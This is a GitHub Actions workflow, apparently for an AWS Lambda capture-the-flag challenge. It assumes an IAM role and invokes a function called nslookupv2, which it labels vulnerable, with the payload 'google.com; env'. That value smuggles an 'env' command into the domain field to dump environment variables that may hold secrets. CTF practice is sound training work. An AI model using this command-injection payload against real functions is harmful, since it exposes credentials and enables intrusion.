name: AWS Lambda CTF

# Run this script every time there is a push to the corgi branch
on:
  push:
    branches:
      - corgi

# Required permissions for GitHub to securely authenticate with AWS (OIDC)
permissions:
  id-token: write
  contents: read

jobs:
  find-secret-lambda:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v4

      # Use the official action to interact with AWS
      # Request access to AWS account 009661764077
      - name: Configure AWS Credentials
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::009661764077:role/cicdRole
          aws-region: us-east-1

      #Invoke the vulnerable Lambda function (nslookupv2) with our payload
      - name: Invoke Lambda and Inject Command
        run: |
          aws lambda invoke \
            --function-name nslookupv2 \
            --cli-binary-format raw-in-base64-out \
            --payload '{"domain": "google.com; env"}' \
            response.json
            
          echo "Lambda Response:"
          cat response.json
